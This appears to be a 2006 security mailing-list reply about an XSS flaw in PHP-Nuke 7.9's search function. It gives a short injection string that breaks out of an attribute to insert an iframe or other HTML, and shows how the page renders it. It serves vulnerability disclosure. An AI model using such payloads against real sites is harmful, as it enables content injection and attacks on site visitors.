Re: PHP-Nuke <= 7.9 Search XSS Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Re: PHP-Nuke <= 7.9 Search XSS Vulnerability
From: try_og@xxxxxxxxxxx
Date: 9 Jun 2006 01:26:11 -0000

"><iframe src="http://[site]/ 

will become:
<iframe src="http://[site]/";>

"><"

will become:
<"">

This way, you can put html (maybe even more) on the page you are searching from...

Prev by Date: phazizGuestbook v2.0 - XSS
Next by Date: [USN-292-1] binutils vulnerability
Previous by thread: Re: PHP-Nuke <= 7.9 Search XSS Vulnerability
Next by thread: [SECURITY] [DSA 1091-1] New TIFF packages fix arbitrary code execution
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux